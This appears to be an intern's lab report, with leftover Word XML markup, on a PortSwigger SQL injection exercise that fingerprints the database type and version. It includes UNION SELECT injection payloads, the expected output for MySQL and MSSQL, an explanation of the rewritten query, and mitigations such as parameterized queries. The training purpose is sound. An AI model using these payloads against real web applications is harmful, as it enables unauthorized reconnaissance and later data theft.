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PortSwigger SQL injection lab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Intern id:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 195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Lab :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection Attack (Querying Database Type &amp; Version)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Environment : </w:t>
      </w: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Demonstrate how to retrieve the database type and version using UNION-based SQL injection in a vulnerable parameter.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Application: PortSwigger SQLi Lab – Database Version Query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Vector: Category parameter in product filter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Vulnerability Description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application does not sanitize user-supplied input in the SQL query. By leveraging UNION SELECT, an attacker can inject database-specific functions to identify the database type and version.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Confirm SQL injection works by testing with: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https://&lt;lab-url&gt;/filter?category=Gifts' UNION SELECT NULL,NULL--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Determine the number of columns (already known from previous lab).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2 columns → use NULL,NULL.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3 columns → use NULL,NULL,NULL.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Inject version functions based on the backend database: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MySQL / MariaDB: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' UNION SELECT @@version, NULL--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Returns database version string (e.g., 8.0.33).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Microsoft SQL Server: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' UNION SELECT @@version, NULL--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Returns version string (e.g., Microsoft SQL Server 2019 (RTM)).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Alternative (cross-database):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version() → Works in MySQL and PostgreSQL.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@@version → Works in MySQL and MSSQL.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Observe the response in the web page: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the database is MySQL, the output looks like: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8.0.33-log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the database is MSSQL, the output looks like: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Microsoft SQL Server 2019 (RTM) - 15.0.2000.5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Explanation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vulnerable SQL query might be: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id, name FROM products WHERE category = '&lt;input&gt;';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When injected with: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' UNION SELECT @@version, NULL--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It becomes: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id, name FROM products WHERE category = ''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UNION SELECT @@version, NULL--';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UNION merges results.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@@version reveals database type and version.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Impact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Identifies the database technology (MySQL vs MSSQL).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Enables targeted exploitation using DB-specific payloads.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Critical step before data exfiltration or privilege escalation.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 parameterized queries (e.g., PreparedStatement in Java, cursor.execute(sql, params) in Python).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Restrict error messages and suppress DB output.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Apply principle of least privilege to database accounts.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 THANK YOU ___________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